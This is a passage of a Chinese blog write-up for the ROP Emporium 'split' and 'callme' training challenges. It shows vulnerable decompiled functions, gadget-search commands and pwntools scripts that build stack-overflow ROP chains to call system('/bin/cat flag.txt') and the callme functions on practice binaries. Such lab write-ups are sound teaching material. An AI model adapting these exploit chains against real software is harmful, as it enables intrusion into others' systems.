<li>当目标函数并未查找过时，其中存储有跳转到 <code>.plt</code> 的代码 (未开启 Full RELRO 时)</li>
</ul>
</li>
<li>关于 GOT、PLT 具体的内容可学习 CSAPP 第7章 – 链接</li>
<li>这里借用 <code>.got.plt</code> 表来查看当前程序调用了哪些 libc 函数，我们可以直接通过 plt 表来获取函数的地址用来构造 ROP</li>
</ul>

</details>

<p>另外在 data 段中发现有用的字符串：<code>/bin/cat flag.txt</code> </p>
<img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307164132689.png" alt="image-20220307164132689" style="zoom:50%;" />

<p>考虑直接调用 <code>system(&quot;/bin/cat flag.txt&quot;)</code>，x86_64 中函数的第一个参数通过 rdi 寄存器传递</p>
<p>找 gadget，有 <code>pop rdi; ret</code>：</p>
<img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307170816647.png" alt="image-20220307170816647" style="zoom:50%;" />

<details class="note info"><summary><p>GadgetFinder 的使用</p>
</summary>
<ol>
<li><a target="_blank" rel="noopener" href="https://github.com/sashs/Ropper">ropper</a><ul>
<li>安装：<code>pip3 install ropper</code></li>
<li>使用：<code>ropper -f &lt;program&gt; --search=&quot;pop rdi&quot;</code></li>
</ul>
</li>
<li><a target="_blank" rel="noopener" href="https://github.com/JonathanSalwan/ROPgadget">ROPgadget</a><ul>
<li>安装：<code>pip3 install ROPgadget</code></li>
<li>使用：<code>ROPgadget --binary &lt;program&gt; | grep &quot;pop rdi&quot; </code></li>
</ul>
</li>
</ol>

</details>

<h4 id="思路-2"><a href="#思路-2" class="headerlink" title="思路"></a>思路</h4><p>没有 Canary，直接通过栈溢出修改返回地址，可构造ROP链进行调用</p>
<ol>
<li>调用 <code>pop rdi gadget</code>，将 <code>rdi</code> 指向 <code>/bin/cat flag.txt</code> </li>
<li>调用 <code>system</code> 函数，执行 <code>system(&quot;/bin/cat flag.txt&quot;)</code> </li>
<li>得到 flag</li>
</ol>
<h4 id="payload-2"><a href="#payload-2" class="headerlink" title="payload"></a>payload</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.update(arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./split&#x27;</span>)</span><br><span class="line">rop = ROP(elf)</span><br><span class="line">io = elf.process()</span><br><span class="line"></span><br><span class="line">POP_RDI_RET = <span class="number">0x00000000004007c3</span></span><br><span class="line"></span><br><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">32</span>),                 <span class="comment"># buffer</span></span><br><span class="line">    cyclic(<span class="number">8</span>),                  <span class="comment"># fake rbp</span></span><br><span class="line">    p64(rop.ret.address),       <span class="comment"># ret gadget</span></span><br><span class="line">    p64(POP_RDI_RET),           <span class="comment"># 参数1</span></span><br><span class="line">    p64(elf.sym.usefulString),  <span class="comment"># &quot;/bin/cat flag.txt&quot;</span></span><br><span class="line">    p64(elf.plt.system)         <span class="comment"># system(&quot;/bin/cat flag.txt&quot;)</span></span><br><span class="line">])</span><br><span class="line">io.recv()</span><br><span class="line">io.send(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>得到 flag：<code>ROPE&#123;a_placeholder_32byte_flag!&#125;</code></p>
<h3 id="x86-1"><a href="#x86-1" class="headerlink" title="x86"></a>x86</h3><h4 id="程序分析-2"><a href="#程序分析-2" class="headerlink" title="程序分析"></a>程序分析</h4><p>32 位程序的缓冲区大小略有不同：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">pwnme</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  undefined local_2c [<span class="number">40</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="built_in">memset</span>(local_2c,<span class="number">0</span>,<span class="number">0x20</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Contriving a reason to ask user for data...&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>,local_2c,<span class="number">0x60</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Thank you!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="思路-3"><a href="#思路-3" class="headerlink" title="思路"></a>思路</h4><p>思路同上，不过 x86 函数调用中，参数在栈上传递：<a href="https://ex7l0it.github.io/2022/08/13/stackoverflow/#32bit">x86 函数调用栈</a></p>
<h4 id="payload-3"><a href="#payload-3" class="headerlink" title="payload"></a>payload</h4><p>payload 稍加修改：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">40</span>),                <span class="comment"># buffer</span></span><br><span class="line">    cyclic(<span class="number">4</span>),                 <span class="comment"># fake ebp</span></span><br><span class="line">    p32(elf.plt.system),       <span class="comment"># return address</span></span><br><span class="line">    cyclic(<span class="number">4</span>),                 <span class="comment"># next return address</span></span><br><span class="line">    p32(elf.sym.usefulString)  <span class="comment"># 参数1</span></span><br><span class="line">])</span><br></pre></td></tr></table></figure>

<p>得到 flag：<code>ROPE&#123;a_placeholder_32byte_flag!&#125;</code></p>
<h2 id="Challenge3-callme"><a href="#Challenge3-callme" class="headerlink" title="Challenge3 callme"></a>Challenge3 callme</h2><p>题目说明及文件: <a target="_blank" rel="noopener" href="https://ropemporium.com/challenge/callme.html">https://ropemporium.com/challenge/callme.html</a></p>
<h3 id="x86-64-2"><a href="#x86-64-2" class="headerlink" title="x86_64"></a>x86_64</h3><h4 id="程序分析-3"><a href="#程序分析-3" class="headerlink" title="程序分析"></a>程序分析</h4><p>检查开启的安全保护：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[*] &#x27;/home/ubuntu/Datas/rop-emporium/callme/callme&#x27;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br><span class="line">    RUNPATH:  b&#x27;.&#x27;</span><br></pre></td></tr></table></figure>

<p>发现开启了 NX 和 Partial RELRO</p>
<p>再反编译源码，同样容易找到存在栈溢出的函数 pwnme()：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">pwnme</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  undefined local_28 [<span class="number">32</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="built_in">memset</span>(local_28,<span class="number">0</span>,<span class="number">0x20</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Hope you read the instructions...\n&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>,local_28,<span class="number">0x200</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Thank you!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里有 usefulFunction 函数：</p>
<p><img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307174011602.png" alt="image-20220307174011602"></p>
<p>根据题目所描述，需要依次调用 <code>callme_one(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)</code> 、<code>callme_two(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)</code>、<code>callme_three(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d) </code>函数，然后即可得到 flag</p>
<p>x86_64 的函数调用，参数1、参数2、参数3分别通过 RDI、RSI 和 RDX 寄存器传递</p>
<p>程序中可以找到 <code>usefulGadgets</code>，刚好可以用来指定这三个参数：</p>
<img src="https://raw.githubusercontent.com/ex7l0it/ImageHosting/master/Picture/image-20220307174539471.png" alt="image-20220307174539471" style="zoom:50%;" />

<h4 id="思路-4"><a href="#思路-4" class="headerlink" title="思路"></a>思路</h4><p>没有 Canary，直接通过栈溢出修改返回地址，可构造ROP链进行调用</p>
<ol>
<li>先调用 <code>usefulGadgets</code>，将 rdi、rsi 和 rdx 分别赋值 <code>0xdeadbeefdeadbeef</code>、<code>0xcafebabecafebabe</code> 和 <code>0xd00df00dd00df00d</code></li>
<li>再调用 <code>callme_one</code> 函数</li>
<li>再调用 <code>usefulGadgets</code> 然后调用 <code>callme_two</code> </li>
<li>再调用 <code>usefulGadgets</code> 然后调用 <code>callme_three</code> </li>
<li>得到 flag</li>
</ol>
<h4 id="payload-4"><a href="#payload-4" class="headerlink" title="payload"></a>payload</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.update(arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./callme&#x27;</span>)</span><br><span class="line">io = elf.process()</span><br><span class="line"></span><br><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">32</span>),</span><br><span class="line">    cyclic(<span class="number">8</span>),</span><br><span class="line">    p64(elf.sym.usefulGadgets), <span class="comment"># pop rdi; pop rsi; pop rdx;</span></span><br><span class="line">    p64(<span class="number">0xdeadbeefdeadbeef</span>),    <span class="comment"># 参数1</span></span><br><span class="line">    p64(<span class="number">0xcafebabecafebabe</span>),    <span class="comment"># 参数2</span></span><br><span class="line">    p64(<span class="number">0xd00df00dd00df00d</span>),    <span class="comment"># 参数3</span></span><br><span class="line">    p64(elf.sym.callme_one),</span><br><span class="line">    p64(elf.sym.usefulGadgets),</span><br><span class="line">    p64(<span class="number">0xdeadbeefdeadbeef</span>),</span><br><span class="line">    p64(<span class="number">0xcafebabecafebabe</span>),</span><br><span class="line">    p64(<span class="number">0xd00df00dd00df00d</span>),</span><br><span class="line">    p64(elf.sym.callme_two),</span><br><span class="line">    p64(elf.sym.usefulGadgets),</span><br><span class="line">    p64(<span class="number">0xdeadbeefdeadbeef</span>),</span><br><span class="line">    p64(<span class="number">0xcafebabecafebabe</span>),</span><br><span class="line">    p64(<span class="number">0xd00df00dd00df00d</span>),</span><br><span class="line">    p64(elf.sym.callme_three)</span><br><span class="line">])</span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(payload)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>得到 flag：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Thank you!</span><br><span class="line">[DEBUG] Received 0x1e bytes:</span><br><span class="line">    b&#x27;callme_one() called correctly\n&#x27;</span><br><span class="line">callme_one() called correctly</span><br><span class="line">[*] Process &#x27;/home/ubuntu/Datas/rop-emporium/callme/callme&#x27; stopped with exit code 0 (pid 10210)</span><br><span class="line">[DEBUG] Received 0x3f bytes:</span><br><span class="line">    b&#x27;callme_two() called correctly\n&#x27;</span><br><span class="line">    b&#x27;ROPE&#123;a_placeholder_32byte_flag!&#125;\n&#x27;</span><br><span class="line">callme_two() called correctly</span><br><span class="line">ROPE&#123;a_placeholder_32byte_flag!&#125;</span><br></pre></td></tr></table></figure>

<h3 id="x86-2"><a href="#x86-2" class="headerlink" title="x86"></a>x86</h3><h4 id="程序分析-4"><a href="#程序分析-4" class="headerlink" title="程序分析"></a>程序分析</h4><p>32 位程序的缓冲区大小略有不同：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">pwnme</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  undefined local_2c [<span class="number">40</span>];</span><br><span class="line">  </span><br><span class="line">  <span class="built_in">memset</span>(local_2c,<span class="number">0</span>,<span class="number">0x20</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Hope you read the instructions...\n&quot;</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>,local_2c,<span class="number">0x200</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Thank you!&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="思路-5"><a href="#思路-5" class="headerlink" title="思路"></a>思路</h4><p>没有 Canary，直接通过栈溢出修改返回地址，可构造ROP链进行调用，稍不同于64位，执行完一个函数后需要先跳转回漏洞函数，再次触发栈溢出漏洞</p>
<ol>
<li>调用 <code>callme_one</code> 函数，然后将程序再次跳回 <code>main</code>，重新触发栈溢出漏洞</li>
<li>调用 <code>callme_two</code> 函数，然后将程序再次跳回 <code>main</code>，重新触发栈溢出漏洞</li>
<li>调用 <code>callme_three</code> 函数</li>
<li>得到 flag</li>
</ol>
<h4 id="payload-5"><a href="#payload-5" class="headerlink" title="payload"></a>payload</h4><p>payload 改动较大：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">payload = flat([</span><br><span class="line">    cyclic(<span class="number">40</span>),</span><br><span class="line">    cyclic(<span class="number">4</span>),</span><br><span class="line">    p32(elf.sym.callme_one), <span class="comment"># return address</span></span><br><span class="line">    p32(elf.sym.pwnme),      <span class="comment"># next address</span></span><br><span class="line">    p32(<span class="number">0xdeadbeef</span>),         <span class="comment"># 参数1</span></span><br><span class="line">    p32(<span class="number">0xcafebabe</span>),         <span class="comment"># 参数2</span></span><br><span class="line">    p32(<span class="number">0xd00df00d</span>),         <span class="comment"># 参数3</span></span><br><span class="line">])</span><br><span class="line">payload2 = flat([</span><br><span class="line">    cyclic(<span class="number">40</span>),</span><br><span class="line">    cyclic(<span class="number">4</span>),</span><br><span class="line">    p32(elf.sym.callme_two),</span><br><span class="line">    p32(elf.sym.pwnme),</span><br><span class="line">    p32(<span class="number">0xdeadbeef</span>),</span><br><span class="line">    p32(<span class="number">0xcafebabe</span>),</span><br><span class="line">    p32(<span class="number">0xd00df00d</span>),</span><br><span class="line">])</span><br><span class="line">payload3 = flat([</span><br><span class="line">    cyclic(<span class="number">40</span>),</span><br><span class="line">    cyclic(<span class="number">4</span>),</span><br><span class="line">    p32(elf.sym.callme_three),</span><br><span class="line">    p32(elf.sym.exit),</span><br><span class="line">    p32(<span class="number">0xdeadbeef</span>),</span><br><span class="line">    p32(<span class="number">0xcafebabe</span>),</span><br><span class="line">    p32(<span class="number">0xd00df00d</span>),</span><br><span class="line">])</span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(payload2)</span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(payload3)</span><br></pre></td></tr></table></figure>

<p>得到 flag：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[DEBUG] Received 0x6f bytes:</span><br><span class="line">    b&#x27;callme_two() called correctly\n&#x27;</span><br><span class="line">    b&#x27;Hope you read the instructions...\n&#x27;</span><br><span class="line">    b&#x27;\n&#x27;</span><br><span class="line">    b&#x27;&gt; Thank you!\n&#x27;</span><br><span class="line">    b&#x27;ROPE&#123;a_placeholder_32byte_flag!&#125;\n&#x27;</span><br><span class="line">callme_two() called correctly</span><br><span class="line">Hope you read the instructions...</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">&gt; </span><span class="language-bash">Thank you!</span></span><br><span class="line">ROPE&#123;a_placeholder_32byte_flag!&#125;</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>Ex7l0it
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://ex7l0it.github.io/2022/03/07/ropemporium-wp-1/" title="ROP Emporium - Challenge1-3 Writeup">https://ex7l0it.github.io/2022/03/07/ropemporium-wp-1/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"><i class="fa fa-tag"></i> pwn</a>
              <a href="/tags/writeup/" rel="tag"><i class="fa fa-tag"></i> writeup</a>
              <a href="/tags/rop/" rel="tag"><i class="fa fa-tag"></i> rop</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/01/28/windows-sticky-keys-backdoor/" rel="prev" title="Windows 粘滞键后门">
                  <i class="fa fa-angle-left"></i> Windows 粘滞键后门
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/08/13/stackoverflow/" rel="next" title="Pwn 栈溢出">
                  Pwn 栈溢出 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    
  
  <div class="comments giscus-container">
  </div>
  
  
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Ex7l0it</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">66k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">4:01</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>




  <script src="/js/third-party/fancybox.js"></script>

  <script src="/js/third-party/pace.js"></script>


  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




<script class="next-config" data-name="giscus" type="application/json">{"enable":true,"repo":"ex7l0it/ex7l0it.github.io","repo_id":"R_kgDOJOCRMg","category":"R_kgDOJOCRMg","category_id":"DIC_kwDOJOCRMs4CbF3g","mapping":"pathname","reactions_enabled":1,"emit_metadata":1,"theme":"preferred-color-scheme","lang":"zh-CN","crossorigin":"anonymous","input_position":"top","loading":"lazy"}</script>

<script>
document.addEventListener('page:loaded', () => {
  if (!CONFIG.page.comments) return;

  NexT.utils.loadComments('.giscus-container')
    .then(() => NexT.utils.getScript('https://giscus.app/client.js', {
      attributes: {
        async                   : true,
        crossOrigin             : 'anonymous',
        'data-repo'             : CONFIG.giscus.repo,
        'data-repo-id'          : CONFIG.giscus.repo_id,
        'data-category'         : CONFIG.giscus.category,
        'data-category-id'      : CONFIG.giscus.category_id,
        'data-mapping'          : CONFIG.giscus.mapping,
        'data-reactions-enabled': CONFIG.giscus.reactions_enabled,
        'data-emit-metadata'    : CONFIG.giscus.emit_metadata,
        'data-theme'            : CONFIG.giscus.theme,
        'data-lang'             : CONFIG.giscus.lang,
        'data-input-position'   : CONFIG.giscus.input_position,
        'data-loading'          : CONFIG.giscus.loading
      },
      parentNode: document.querySelector('.giscus-container')
    }));
});
</script>




  
  <script src="https://cdn.staticfile.org/jquery/3.7.0/jquery.min.js"></script>
  
  <script src="/js/outdate.js"></script>





</body>
</html>
